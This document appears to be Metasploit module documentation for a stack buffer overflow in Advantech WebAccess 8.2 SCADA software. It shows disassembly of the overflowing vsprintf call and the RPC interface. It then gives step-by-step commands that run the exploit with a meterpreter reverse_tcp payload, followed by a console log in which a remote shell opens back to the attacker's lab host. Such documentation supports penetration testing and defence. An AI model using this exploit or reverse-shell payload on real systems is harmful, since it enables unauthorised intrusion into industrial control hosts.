## Vulnerable Application [Advantech WebAccess <= 8.2](http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170330.exe) ## Vulnerability Analysis The stack overflow happens in sub_10004BC8: ``` .text:10004BC8 ; int __cdecl sub_10004BC8(char *Format, char) .text:10004BC8 sub_10004BC8 proc near ; .text:10004BC8 ; .text:10004BC8 .text:10004BC8 lpWindowName = dword ptr -818h .text:10004BC8 hWnd = dword ptr -814h .text:10004BC8 lpClassName = dword ptr -810h .text:10004BC8 Args = dword ptr -80Ch .text:10004BC8 lpBaseAddress = dword ptr -808h .text:10004BC8 hFileMappingObject= dword ptr -804h .text:10004BC8 Dest = byte ptr -800h .text:10004BC8 Format = dword ptr 8 .text:10004BC8 arg_4 = byte ptr 0Ch .text:10004BC8 .text:10004BC8 push ebp .text:10004BC9 mov ebp, esp .text:10004BCB sub esp, 818h .text:10004BD1 mov [ebp+lpWindowName], offset aDebugScreen1 ; "Debug Screen1" .text:10004BDB mov [ebp+lpClassName], offset aDebugwclass1 ; "debugWClass1" .text:10004BE5 lea eax, [ebp+arg_4] .text:10004BE8 mov [ebp+Args], eax .text:10004BEE mov ecx, [ebp+Args] .text:10004BF4 push ecx ; Args .text:10004BF5 mov edx, [ebp+Format] .text:10004BF8 push edx ; Format .text:10004BF9 lea eax, [ebp+Dest] .text:10004BFF push eax ; Dest .text:10004C00 call ds:vsprintf ; overflow ``` The corresponding IDL is below: ``` [ uuid(5d2b62aa-ee0a-4a95-91ae-b064fdb471fc), version(1.0) ] interface target_interface { /* opcode: 0x01, address: 0x00401260 */ void sub_401260 ( [in] handle_t arg_1, [in] long arg_2, [in] long arg_3, [in] long arg_4, [in][ref][size_is(arg_4)] char * arg_5, [out][ref] long * arg_6 ); } ``` ## Verification Steps 1. Start `msfconsole` 2. `use exploits/windows/scada/advantech_webaccess_webvrpcs_bof` 3. `set payload windows/meterpreter/reverse_tcp` 4. `set LHOST XXX.XXX.XXX.XXX` 5. `exploit` 6. **Verify** you get a connect back meterpreter ## Options None. ## Scenarios ``` saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/advantech.rc [*] Processing scripts/advantech.rc for ERB directives. resource (scripts/advantech.rc)> use exploit/windows/scada/advantech_webaccess_webvrpcs_bof resource (scripts/advantech.rc)> set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp resource (scripts/advantech.rc)> set RHOST 172.16.175.136 RHOST => 172.16.175.136 resource (scripts/advantech.rc)> set LHOST 172.16.175.1 LHOST => 172.16.175.1 resource (scripts/advantech.rc)> exploit [*] Started reverse TCP handler on 172.16.175.1:4444 [*] 172.16.175.136:4592 - Binding to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ... [*] 172.16.175.136:4592 - Bound to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ... [+] 172.16.175.136:4592 - Got a handle: 0x01ef2558 [*] 172.16.175.136:4592 - Trying target Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31... [*] Sending stage (179779 bytes) to 172.16.175.136 [*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.136:49206) at 2017-12-11 11:32:15 -0600 [*] 172.16.175.136:4592 - The DCERPC service did not reply to our request meterpreter > shell Process 5208 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\WebAccess\Node> ```